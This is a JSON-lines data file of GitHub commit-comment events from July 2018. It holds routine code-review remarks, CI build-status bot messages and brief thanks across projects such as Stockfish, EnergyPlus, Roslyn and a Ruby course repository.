Badge](http://img.shields.io/badge/coverage%20status-71.22%25-green.png)</a>\n"}},"created_at":"2018-07-15T02:37:57Z"}
{"id":"7966688109","type":"CommitCommentEvent","actor":{"login":"larsks"},"repo":{"name":"CCI-MOC/rhosp-director-config"},"payload":{"comment":{"id":29711148,"position":null,"line":null,"path":null,"commit_id":"d0d3fbb48414406840918cf7bae010540bbd7656","created_at":"2018-07-15T02:38:17Z","updated_at":"2018-07-15T02:38:17Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Deploy Octavia](https://trello.com/c/u1sS6iJU/70-deploy-octavia)"}},"created_at":"2018-07-15T02:38:17Z"}
{"id":"7966688403","type":"CommitCommentEvent","actor":{"login":"larsks"},"repo":{"name":"CCI-MOC/rhosp-director-config"},"payload":{"comment":{"id":29711150,"position":null,"line":null,"path":null,"commit_id":"d31c553b791220788151325ef6bfa1478fd7358c","created_at":"2018-07-15T02:38:38Z","updated_at":"2018-07-15T02:38:38Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Statically set service VIP rather than allowing it to be selected at random during deploy](https://trello.com/c/O0s4POBw/53-statically-set-service-vip-rather-than-allowing-it-to-be-selected-at-random-during-deploy)"}},"created_at":"2018-07-15T02:38:38Z"}
{"id":"7966688892","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29711151,"position":null,"line":null,"path":null,"commit_id":"c856107fb840bc12b99d0010186b2425b0700a1d","created_at":"2018-07-15T02:39:12Z","updated_at":"2018-07-15T02:39:12Z","author_association":"NONE","body":"I don't think this is a simplification either. Furthermore, it is just weird. If we have two queens ... you just want to always evaluate the LSB? No sense here. "}},"created_at":"2018-07-15T02:39:12Z"}
{"id":"7966689101","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29711152,"position":null,"line":null,"path":null,"commit_id":"8b1e5a092fa43a51a252f62cd82ea6373d632421","created_at":"2018-07-15T02:39:27Z","updated_at":"2018-07-15T02:39:27Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (Unknown) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b1e5a092fa43a51a252f62cd82ea6373d632421-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a>  \n"}},"created_at":"2018-07-15T02:39:27Z"}
{"id":"7966690001","type":"CommitCommentEvent","actor":{"login":"heejaechang"},"repo":{"name":"dotnet/roslyn"},"payload":{"comment":{"id":29711156,"position":43,"line":70,"path":"src/VisualStudio/Core/Def/Implementation/Utilities/ServiceInitializer.cs","commit_id":"4890c8e1874132199adad253b14403bd0d817471","created_at":"2018-07-15T02:40:25Z","updated_at":"2018-07-15T02:40:25Z","author_association":"CONTRIBUTOR","body":"I can make the second _gate not cancellable if we want that. but since initialize will get called only once, I dont think there is problem with the cancellation. _service is a cache, so it is fine getting it twice. as long as initialize is guranteed to be called only once."}},"created_at":"2018-07-15T02:40:25Z"}
{"id":"7966691031","type":"CommitCommentEvent","actor":{"login":"a494097564"},"repo":{"name":"frk1/hazedumper"},"payload":{"comment":{"id":29711161,"position":null,"line":null,"path":null,"commit_id":"59749e4e675adb44ae3af20f195c1107d3cf6b58","created_at":"2018-07-15T02:41:32Z","updated_at":"2018-07-15T02:41:32Z","author_association":"NONE","body":"Game in 12.07.2018, updated 460M size, 13.07.2018, updated 30M size. I think these offsets are 12.07. 2018 updates, not 13.07. 2018 updates. That's why our program doesn't work."}},"created_at":"2018-07-15T02:41:32Z"}
{"id":"7966693748","type":"CommitCommentEvent","actor":{"login":"ericyarek"},"repo":{"name":"ericyarek/MyFirstGitRepo"},"payload":{"comment":{"id":29711165,"position":null,"line":null,"path":null,"commit_id":"bbeae04829de2ca47190fe8505886a4fdfd3d8a6","created_at":"2018-07-15T02:44:40Z","updated_at":"2018-07-15T02:44:40Z","author_association":"OWNER","body":"good job"}},"created_at":"2018-07-15T02:44:40Z"}
{"id":"7966693920","type":"CommitCommentEvent","actor":{"login":"levibrooke"},"repo":{"name":"tapinguide/matchday-mobile"},"payload":{"comment":{"id":29711166,"position":null,"line":null,"path":null,"commit_id":"7148cf6fcc77e786322b674a5b77e8c5b47cb987","created_at":"2018-07-15T02:44:52Z","updated_at":"2018-07-15T02:44:52Z","author_association":"CONTRIBUTOR","body":"@alxmrtnz Yea, no problem. It was good for me to get my local environment setup to run and test changes to the mobile app too."}},"created_at":"2018-07-15T02:44:52Z"}
{"id":"7966694493","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29711167,"position":null,"line":null,"path":null,"commit_id":"c856107fb840bc12b99d0010186b2425b0700a1d","created_at":"2018-07-15T02:45:28Z","updated_at":"2018-07-15T02:45:28Z","author_association":"NONE","body":"See the assert in the following piece of code.\r\n\r\n```\r\ntemplate<PieceType Pt> inline Square Position::square(Color c) const {\r\n  assert(pieceCount[make_piece(c, Pt)] == 1); \r\n  return pieceList[make_piece(c, Pt)][0];\r\n}\r\n```\r\n\r\nSo this will trigger the assert\r\nand otherwise it is a code obfuscation.\r\n"}},"created_at":"2018-07-15T02:45:28Z"}
{"id":"7966695444","type":"CommitCommentEvent","actor":{"login":"daurnimator"},"repo":{"name":"craigbarnes/lua-gumbo"},"payload":{"comment":{"id":29711169,"position":null,"line":null,"path":null,"commit_id":"733832370118e556bf2619958361a9000bfa5fd3","created_at":"2018-07-15T02:46:28Z","updated_at":"2018-07-15T02:46:28Z","author_association":"CONTRIBUTOR","body":"Great :)"}},"created_at":"2018-07-15T02:46:28Z"}
{"id":"7966697147","type":"CommitCommentEvent","actor":{"login":"mazvi"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29711170,"position":null,"line":null,"path":null,"commit_id":"7a8ac464211d53bd11725d30d909a139db39e307","created_at":"2018-07-15T02:48:34Z","updated_at":"2018-07-15T02:48:34Z","author_association":"CONTRIBUTOR","body":"Please update te_prt_gld,159,25,0\twarp\tprtg02_Castle\t1,1,prt_castle,102,178\r\n\r\nit must be prt_cas"}},"created_at":"2018-07-15T02:48:34Z"}
{"id":"7966697291","type":"CommitCommentEvent","actor":{"login":"cmy666"},"repo":{"name":"cmy666/Thread"},"payload":{"comment":{"id":29711172,"position":null,"line":null,"path":null,"commit_id":"72c9febde759c7a6fb8ab730f1157a5e732b7303","created_at":"2018-07-15T02:48:44Z","updated_at":"2018-07-15T02:48:44Z","author_association":"OWNER","body":"线程池-->submit和execute的区别"}},"created_at":"2018-07-15T02:48:44Z"}
{"id":"7966700513","type":"CommitCommentEvent","actor":{"login":"andrewrk"},"repo":{"name":"jayschwa/zig-snapcraft"},"payload":{"comment":{"id":29711175,"position":null,"line":null,"path":null,"commit_id":"41d3eeeebac6b1ae26bfef9b29db4aa4ab23a057","created_at":"2018-07-15T02:52:28Z","updated_at":"2018-07-15T02:52:28Z","author_association":"NONE","body":"Nice! I just saw the wiki edit :tada: "}},"created_at":"2018-07-15T02:52:28Z"}
{"id":"7966701041","type":"CommitCommentEvent","actor":{"login":"Songyan0501"},"repo":{"name":"Songyan0501/Hello-world"},"payload":{"comment":{"id":29711176,"position":3,"line":3,"path":"README.md","commit_id":"b2c245ff73f05be4be203dddc1fe008352ae1b3b","created_at":"2018-07-15T02:53:02Z","updated_at":"2018-07-15T02:53:02Z","author_association":"OWNER","body":"jfsdhdhfsdhfsdjfdg"}},"created_at":"2018-07-15T02:53:02Z"}
{"id":"7966701788","type":"CommitCommentEvent","actor":{"login":"sadatnfs"},"repo":{"name":"tensorflow/tensorflow"},"payload":{"comment":{"id":29711177,"position":null,"line":null,"path":null,"commit_id":"03ab64c3a68f3b990bf690ede06e3066ad4e35a0","created_at":"2018-07-15T02:53:55Z","updated_at":"2018-07-15T02:53:55Z","author_association":"NONE","body":"Shouldn't there be a LICENSE file inside `third_party/mkl_dnn` folder? My configure is failing because of this new check now."}},"created_at":"2018-07-15T02:53:55Z"}
{"id":"7966704345","type":"CommitCommentEvent","actor":{"login":"bokken12"},"repo":{"name":"FinnitoProductions/SummerRoboCode2018"},"payload":{"comment":{"id":29711181,"position":29,"line":48,"path":"src/org/usfirst/frc/team1072/robot/commands/CombinedPositionAnglePID.java","commit_id":"0b41e0255607ebb9b924d7a46014afddb8cc9636","created_at":"2018-07-15T02:56:57Z","updated_at":"2018-07-15T02:56:57Z","author_association":"COLLABORATOR","body":"You probably don't need line 48 anymore either with your new method"}},"created_at":"2018-07-15T02:56:57Z"}
{"id":"7966704644","type":"CommitCommentEvent","actor":{"login":"mazvi"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29711182,"position":null,"line":null,"path":null,"commit_id":"cfb8b42d848191946d6273a52535f44733c26187","created_at":"2018-07-15T02:57:19Z","updated_at":"2018-07-15T02:57:19Z","author_association":"CONTRIBUTOR","body":"please update depending episode 16.1"}},"created_at":"2018-07-15T02:57:19Z"}
{"id":"7966705783","type":"CommitCommentEvent","actor":{"login":"bokken12"},"repo":{"name":"FinnitoProductions/SummerRoboCode2018"},"payload":{"comment":{"id":29711183,"position":null,"line":null,"path":null,"commit_id":"977f71b0d1025d43879b4858fe24bc574c9b3570","created_at":"2018-07-15T02:58:40Z","updated_at":"2018-07-15T02:58:40Z","author_association":"COLLABORATOR","body":"Hey, that's pretty good, our auton might no longer look like it's failing for the first second or so"}},"created_at":"2018-07-15T02:58:40Z"}
{"id":"7966705809","type":"CommitCommentEvent","actor":{"login":"jgensler8"},"repo":{"name":"jgensler8/mushroom-detection"},"payload":{"comment":{"id":29711184,"position":3,"line":3,"path":"util/model_version.yaml","commit_id":"77f27e5115c0490e7ee527e58c7b35ab9ec4e5f5","created_at":"2018-07-15T02:58:41Z","updated_at":"2018-07-15T02:58:41Z","author_association":"OWNER","body":"The default machine type was very slow (so slow that I didn't wait for requests to finish). Time was 3+ minutes so I decided that wouldn't meet 5 minute SLA for FaaS."}},"created_at":"2018-07-15T02:58:41Z"}
{"id":"7966705990","type":"CommitCommentEvent","actor":{"login":"PuercoPop"},"repo":{"name":"joaotavora/sly"},"payload":{"comment":{"id":29711185,"position":null,"line":null,"path":null,"commit_id":"7833f58281f4f9eda6cf590e3ce22022e3b4eafb","created_at":"2018-07-15T02:58:55Z","updated_at":"2018-07-15T02:58:55Z","author_association":"CONTRIBUTOR","body":"If the goal of this commit is for `sly--completion-request-completions` to always return `nil` I think any of the following alternative would be less clunky\r\n\r\n```elisp\r\n(or completions\r\n    (and (not (current-message))\r\n         (sly-message \"No completions for %s\" pattern)\r\n         nil))\r\n\r\n(or completions\r\n    (when (not (current-message))\r\n      (sly-message \"No completions for %S\" pattern)\r\n      (values))) ; Or nil if you prefer\r\n```\r\n"}},"created_at":"2018-07-15T02:58:55Z"}
{"id":"7966706572","type":"CommitCommentEvent","actor":{"login":"kcwork2016"},"repo":{"name":"kcwork2016/React-Base-Project"},"payload":{"comment":{"id":29711186,"position":null,"line":null,"path":null,"commit_id":"e49add5542ec7efa9272e38bf9bfab61e6abc738","created_at":"2018-07-15T02:59:34Z","updated_at":"2018-07-15T02:59:34Z","author_association":"OWNER","body":"init commit"}},"created_at":"2018-07-15T02:59:34Z"}
{"id":"7967871290","type":"CommitCommentEvent","actor":{"login":"PitouGames"},"repo":{"name":"ouest-insa/Incipio"},"payload":{"comment":{"id":29714121,"position":61,"line":23,"path":"src/Mgate/SuiviBundle/Resources/views/Phase/phases.html.twig","commit_id":"75d8684b351e4fe537fbe9ef9c830816e8281993","created_at":"2018-07-15T20:00:10Z","updated_at":"2018-07-15T20:00:10Z","author_association":"COLLABORATOR","body":"Done !"}},"created_at":"2018-07-15T20:00:10Z"}
{"id":"7967871476","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"iamfaqq/thinknetica"},"payload":{"comment":{"id":29714123,"position":1,"line":1,"path":"lesson4/menu.rb","commit_id":"d9c7b11f5f6270707a8e85de2bc7d99dbcd6a4c0","created_at":"2018-07-15T20:00:15Z","updated_at":"2018-07-15T20:00:15Z","author_association":"NONE","body":"А с чем связана разница в названии имени файла и имени класса?"}},"created_at":"2018-07-15T20:00:15Z"}
{"id":"7967875791","type":"CommitCommentEvent","actor":{"login":"MJZ1977"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29714128,"position":null,"line":null,"path":null,"commit_id":"d55ae9d83c5efb6c7f2d9e278c30c3f8c2d78ae4","created_at":"2018-07-15T20:03:14Z","updated_at":"2018-07-15T20:03:14Z","author_association":"NONE","body":"Perhaps we can try something like (3 + rootdepth /2). So we have a minimal depth of 3 if roothDepth is very low ?"}},"created_at":"2018-07-15T20:03:14Z"}
{"id":"7967876743","type":"CommitCommentEvent","actor":{"login":"alama"},"repo":{"name":"Arks-Layer/PSO2ENPatchCSV"},"payload":{"comment":{"id":29714132,"position":4,"line":2,"path":"Tutorial/Window/co_031417.csv","commit_id":"d937b112eaccb9667f692d0db58f40e42b078657","created_at":"2018-07-15T20:04:01Z","updated_at":"2018-07-15T20:04:01Z","author_association":"CONTRIBUTOR","body":"`Issue in File ./Tutorial/Window/co_031417.csv Line2: unexpected end of data`\r\n`error reading ./Tutorial/Window/co_031417.csv: ',' expected after '\"'`\r\n"}},"created_at":"2018-07-15T20:04:01Z"}
{"id":"7967876963","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"iamfaqq/thinknetica"},"payload":{"comment":{"id":29714134,"position":1,"line":1,"path":"lesson4/train_part.rb","commit_id":"86184adbb65d06a449321d207b1aab6367e607b2","created_at":"2018-07-15T20:04:10Z","updated_at":"2018-07-15T20:04:10Z","author_association":"NONE","body":"Не самое лучшее название для вагона) "}},"created_at":"2018-07-15T20:04:10Z"}
{"id":"7967878166","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"iamfaqq/thinknetica"},"payload":{"comment":{"id":29714136,"position":66,"line":66,"path":"lesson4/train.rb","commit_id":"86184adbb65d06a449321d207b1aab6367e607b2","created_at":"2018-07-15T20:04:53Z","updated_at":"2018-07-15T20:04:53Z","author_association":"NONE","body":"это обычный геттер"}},"created_at":"2018-07-15T20:04:53Z"}
{"id":"7967881767","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29714143,"position":null,"line":null,"path":null,"commit_id":"a8a6b30241eb3322ff14c56ac5a4320870ac4e6e","created_at":"2018-07-15T20:07:07Z","updated_at":"2018-07-15T20:07:07Z","author_association":"NONE","body":"#6806-InconsistentConvectionCoeffs (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2320 of 2321 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 650\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8a6b30241eb3322ff14c56ac5a4320870ac4e6e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8a6b30241eb3322ff14c56ac5a4320870ac4e6e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8a6b30241eb3322ff14c56ac5a4320870ac4e6e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-15T20:07:07Z"}
{"id":"7967882255","type":"CommitCommentEvent","actor":{"login":"keith"},"repo":{"name":"keith/dotfiles"},"payload":{"comment":{"id":29714144,"position":null,"line":null,"path":null,"commit_id":"5676af1518aa384b957512159c383610ddb265b3","created_at":"2018-07-15T20:07:25Z","updated_at":"2018-07-15T20:07:25Z","author_association":"OWNER","body":"Nice! I hadn't seen that one!"}},"created_at":"2018-07-15T20:07:25Z"}
{"id":"7967883086","type":"CommitCommentEvent","actor":{"login":"puresky07"},"repo":{"name":"puresky07/selfStats"},"payload":{"comment":{"id":29714145,"position":null,"line":null,"path":null,"commit_id":"6f133acc94de1298c4d231cc1029df3fd2fa75fb","created_at":"2018-07-15T20:07:59Z","updated_at":"2018-07-15T20:07:59Z","author_association":"OWNER","body":"Merci pour ces modifs ! ;)"}},"created_at":"2018-07-15T20:07:59Z"}
{"id":"7967883791","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29714146,"position":null,"line":null,"path":null,"commit_id":"a8a6b30241eb3322ff14c56ac5a4320870ac4e6e","created_at":"2018-07-15T20:08:31Z","updated_at":"2018-07-15T20:08:31Z","author_association":"NONE","body":"#6806-InconsistentConvectionCoeffs (RKStrand) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8a6b30241eb3322ff14c56ac5a4320870ac4e6e-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-15T20:08:31Z"}
{"id":"7967889288","type":"CommitCommentEvent","actor":{"login":"RedTedRedemption"},"repo":{"name":"RedTedRedemption/angular-zero"},"payload":{"comment":{"id":29714148,"position":1,"line":1,"path":"src/app/app.component.css","commit_id":"65bed3031526028cc0ed42e1a81c6e3b76031671","created_at":"2018-07-15T20:12:44Z","updated_at":"2018-07-15T20:12:44Z","author_association":"OWNER","body":"erronious. removing in next commit"}},"created_at":"2018-07-15T20:12:44Z"}
{"id":"7967891005","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"iamfaqq/thinknetica"},"payload":{"comment":{"id":29714150,"position":187,"line":187,"path":"lesson4/user_menu1.rb","commit_id":"3d1b693e8db59c8da694c230e73f7729fe3054e6","created_at":"2018-07-15T20:13:53Z","updated_at":"2018-07-15T20:13:53Z","author_association":"NONE","body":"Обрати внимание, в одном месте ты ставишь пробел после { или |\r\nв другом нет, Нужно придерживаться style guide\r\nА так код выглядит разрознено, как будто пишут разные люди"}},"created_at":"2018-07-15T20:13:53Z"}
{"id":"7967891419","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29714161,"position":null,"line":null,"path":null,"commit_id":"2faef250227e996895aacca5fa62e90d17602a7a","created_at":"2018-07-15T20:14:11Z","updated_at":"2018-07-15T20:14:11Z","author_association":"NONE","body":"develop (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2319 of 2319 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-15T20:14:11Z"}
{"id":"7967891772","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"iamfaqq/thinknetica"},"payload":{"comment":{"id":29714176,"position":163,"line":163,"path":"lesson4/user_menu1.rb","commit_id":"3d1b693e8db59c8da694c230e73f7729fe3054e6","created_at":"2018-07-15T20:14:25Z","updated_at":"2018-07-15T20:14:25Z","author_association":"NONE","body":"Часто делаешь опечатки, будь внимательней"}},"created_at":"2018-07-15T20:14:25Z"}
{"id":"7967892096","type":"CommitCommentEvent","actor":{"login":"jacobq"},"repo":{"name":"quaertym/ember-cli-dependency-checker"},"payload":{"comment":{"id":29714177,"position":null,"line":null,"path":null,"commit_id":"680dc7d3252f27b13d965c3cfe58474d279d06de","created_at":"2018-07-15T20:14:38Z","updated_at":"2018-07-15T20:14:38Z","author_association":"CONTRIBUTOR","body":"Thanks!"}},"created_at":"2018-07-15T20:14:38Z"}
{"id":"7967892686","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"iamfaqq/thinknetica"},"payload":{"comment":{"id":29714181,"position":54,"line":54,"path":"lesson4/train.rb","commit_id":"3d1b693e8db59c8da694c230e73f7729fe3054e6","created_at":"2018-07-15T20:15:03Z","updated_at":"2018-07-15T20:15:03Z","author_association":"NONE","body":"Нельзя так переносить условие, должно быть там же где и elsif"}},"created_at":"2018-07-15T20:15:03Z"}
{"id":"7967893504","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"iamfaqq/thinknetica"},"payload":{"comment":{"id":29714185,"position":39,"line":39,"path":"lesson4/train.rb","commit_id":"3d1b693e8db59c8da694c230e73f7729fe3054e6","created_at":"2018-07-15T20:15:36Z","updated_at":"2018-07-15T20:15:36Z","author_association":"NONE","body":"зачем пустые строки в данном методе?)"}},"created_at":"2018-07-15T20:15:36Z"}
{"id":"7967893865","type":"CommitCommentEvent","actor":{"login":"tudor2k3"},"repo":{"name":"qbittorrent/qBittorrent"},"payload":{"comment":{"id":29714187,"position":null,"line":null,"path":null,"commit_id":"0ad52903890fe680307b46f4051bdd91d8aaffd5","created_at":"2018-07-15T20:15:51Z","updated_at":"2018-07-15T20:15:51Z","author_association":"NONE","body":"I am using the 4.1.1 ebuild and it doesn't find the system provided\nqtsingleapplication. In fact, all ebuilds since the bug report fail to\nconfigure, even though the github/site tarball compiles fine.\n\nÎn 15.07.2018 21:34, Eugene Shalygin a scris:\n\n> What qBt version you are talking about? The -9999.ebuild is outdated, 4.1.1 correctly passes -DSYSTEM_QTSINGLEAPPLICATION=ON. \n> \n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub [1], or mute the thread [2].\n \n\nLinks:\n------\n[1]\nhttps://github.com/qbittorrent/qBittorrent/commit/0ad52903890fe680307b46f4051bdd91d8aaffd5#commitcomment-29713855\n[2]\nhttps://github.com/notifications/unsubscribe-auth/APqjSiOiswsntp6TiANP1WCHu_fEb8pQks5uG4sygaJpZM4QBssP"}},"created_at":"2018-07-15T20:15:51Z"}
{"id":"7967894880","type":"CommitCommentEvent","actor":{"login":"markgoho-EDT"},"repo":{"name":"angular/angular-cli"},"payload":{"comment":{"id":29714189,"position":50,"line":62,"path":"docs/documentation/stories/continuous-integration.md","commit_id":"7c00838f1906928da2e007daae2d6a4da853b672","created_at":"2018-07-15T20:16:34Z","updated_at":"2018-07-15T20:16:34Z","author_association":"NONE","body":"these flags seem to have no effect"}},"created_at":"2018-07-15T20:16:34Z"}
{"id":"7967896090","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"iamfaqq/thinknetica"},"payload":{"comment":{"id":29714190,"position":17,"line":17,"path":"lesson4/route.rb","commit_id":"3d1b693e8db59c8da694c230e73f7729fe3054e6","created_at":"2018-07-15T20:17:28Z","updated_at":"2018-07-15T20:17:28Z","author_association":"NONE","body":"Это обычные геттеры"}},"created_at":"2018-07-15T20:17:28Z"}
{"id":"7967897357","type":"CommitCommentEvent","actor":{"login":"dscho"},"repo":{"name":"gitgitgadget/gitgitgadget"},"payload":{"comment":{"id":29714192,"position":18,"line":83,"path":"lib/project-options.ts","commit_id":"4816535241d125d7828be55f8ccf35f2089acd5b","created_at":"2018-07-15T20:18:27Z","updated_at":"2018-07-15T20:18:27Z","author_association":"CONTRIBUTOR","body":"I think this should prefix the condition with `baseCommit && ` (as `baseCommit` can be unspecified)."}},"created_at":"2018-07-15T20:18:27Z"}
{"id":"7967898469","type":"CommitCommentEvent","actor":{"login":"tdewolff"},"repo":{"name":"tdewolff/minify"},"payload":{"comment":{"id":29714194,"position":null,"line":null,"path":null,"commit_id":"835afedd1a7d95549ad735ed1c5ba3d357e21674","created_at":"2018-07-15T20:19:22Z","updated_at":"2018-07-15T20:19:22Z","author_association":"OWNER","body":"Well, in this case it resembles a valid declaration, but what do you suggest to do when the bad declarations reads as `*zoom : : 0px ;`? Should it be `*zoom::0`? There are three ways to approach this in my opinion:\r\n\r\n1. Allow the parser to parse semi-correct declarations, such as those beginning with an asterisk (legacy from older browsers)\r\n2. Let the minifier check if the bad declaration resembles somewhat a correct declaration (ie. has one colon)\r\n3. Output bad declarations as they are, as we cannot make any assumptions about its erroneous content\r\n\r\nOption 2 basically does the work of a parser, so I'm against that. I can see option 1 as a possibility, though this would go against the specifications. I think option 3 is not that bad, bad declarations are not that common anyways..."}},"created_at":"2018-07-15T20:19:22Z"}
{"id":"7967899201","type":"CommitCommentEvent","actor":{"login":"jrunnber"},"repo":{"name":"emma-wong/Social-Analytics"},"payload":{"comment":{"id":29714196,"position":null,"line":null,"path":null,"commit_id":"73b5defeaff753080361393660bd3fb4dbdc8dba","created_at":"2018-07-15T20:19:53Z","updated_at":"2018-07-15T20:19:53Z","author_association":"COLLABORATOR","body":"Added in my code for the getting tweet information. tweet.js has the api call and grabs the relevant information, and config has authentication information. "}},"created_at":"2018-07-15T20:19:53Z"}
{"id":"7967899271","type":"CommitCommentEvent","actor":{"login":"MJZ1977"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29714197,"position":null,"line":null,"path":null,"commit_id":"d55ae9d83c5efb6c7f2d9e278c30c3f8c2d78ae4","created_at":"2018-07-15T20:19:57Z","updated_at":"2018-07-15T20:19:57Z","author_association":"NONE","body":"Or perhaps (2 + roothdepth/4) if you want to search at low depths :)"}},"created_at":"2018-07-15T20:19:57Z"}
{"id":"7967900734","type":"CommitCommentEvent","actor":{"login":"dyusuf"},"repo":{"name":"bornabesic/cytokine-graph-db"},"payload":{"comment":{"id":29714198,"position":null,"line":null,"path":null,"commit_id":"eba3bc32b7dccfc2673c330cb159ceca0ee34db8","created_at":"2018-07-15T20:20:56Z","updated_at":"2018-07-15T20:20:56Z","author_association":"COLLABORATOR","body":"it may not be good idea to have seperate edges for each predicted action e.g. binding etc. \r\n\r\nalso, i think we should leave out the property related to function e.g. pathway. this creates issue in graph design. let's learn to build and develop graph database first.\r\n\r\nmy suggestions:\r\n\r\nCREATE\r\n\r\n    // Create nodes\r\n\r\n    (ccr5:ChemokineReceptor {\r\n        label: \"CCR5\",\r\n        name: \"Chemokine (C-C motif) receptor 5\",\r\n        structure: \"CC\"\r\n    }),\r\n    (ccl5:ChemokineLigand {\r\n        label: \"CCL5\",\r\n        name: \"Chemokine (C-C motif) ligand 5\",\r\n        structure: \"CC\"\r\n    }),\r\n    (il10ra:CytokineReceptorSubunit {\r\n        label: \"IL10RA\",\r\n        receptor: \"Interleukin 10 receptor\",\r\n        subunit: \"alpha\"\r\n    }),\r\n\r\n    // Create relationships\r\n\r\n    // CCL5 <-> CCR5\r\n    (ccl5)-[:interaction {\r\n        score: 0.993\r\n        } ]->(ccr5),\r\n    (ccl5)-[:predicted_actions{\r\n        binding: 0.849,\r\n        catalysis: 0.849\r\n        //add all available predicted actions\r\n    } ]->(ccr5),\r\n     // CCL5 <-> IL10RA\r\n    (ccl5)-[:interaction {\r\n        score: 0.547\r\n    } ]->(il10ra),\r\n    // IL10RA <-> CCR5\r\n    (il10ra)-[:interaction {\r\n        score: 0.469\r\n    } ]->(ccr5)\r\n\r\ntoy with the following example: https://version-10-5.string-db.org/cgi/network.pl?networkId=2b9LDretoPeo\r\n\r\nonce you build the corresponding database, also send me some query example such as show all nodes connected to Ccr5 and what are the corresponding predicted actions etc. "}},"created_at":"2018-07-15T20:20:56Z"}
{"id":"7967903217","type":"CommitCommentEvent","actor":{"login":"dyusuf"},"repo":{"name":"bornabesic/cytokine-graph-db"},"payload":{"comment":{"id":29714202,"position":null,"line":null,"path":null,"commit_id":"eba3bc32b7dccfc2673c330cb159ceca0ee34db8","created_at":"2018-07-15T20:22:48Z","updated_at":"2018-07-15T20:22:48Z","author_association":"COLLABORATOR","body":"ps: for the property of interaction, also add the scores of  7 channels as you did before"}},"created_at":"2018-07-15T20:22:48Z"}
{"id":"7967904635","type":"CommitCommentEvent","actor":{"login":"vpacik"},"repo":{"name":"vpacik/aligem"},"payload":{"comment":{"id":29714203,"position":null,"line":null,"path":null,"commit_id":"7121647e41bb74e35504a6c17f2b5c79be31a904","created_at":"2018-07-15T20:23:53Z","updated_at":"2018-07-15T20:23:53Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Python 3 compatibility](https://trello.com/c/7zR2ldDf/12-python-3-compatibility)"}},"created_at":"2018-07-15T20:23:53Z"}
{"id":"7967911449","type":"CommitCommentEvent","actor":{"login":"YakimS"},"repo":{"name":"flerdacodeu/CodeU-2018-Group10"},"payload":{"comment":{"id":29714206,"position":14,"line":14,"path":"group/assignment5/Vertex.java","commit_id":"4bfaace1621b86ad9416d28f7b43ebe0baa1df4f","created_at":"2018-07-15T20:29:10Z","updated_at":"2018-07-15T20:29:10Z","author_association":"COLLABORATOR","body":"This class can be contained inside Graph.java"}},"created_at":"2018-07-15T20:29:10Z"}
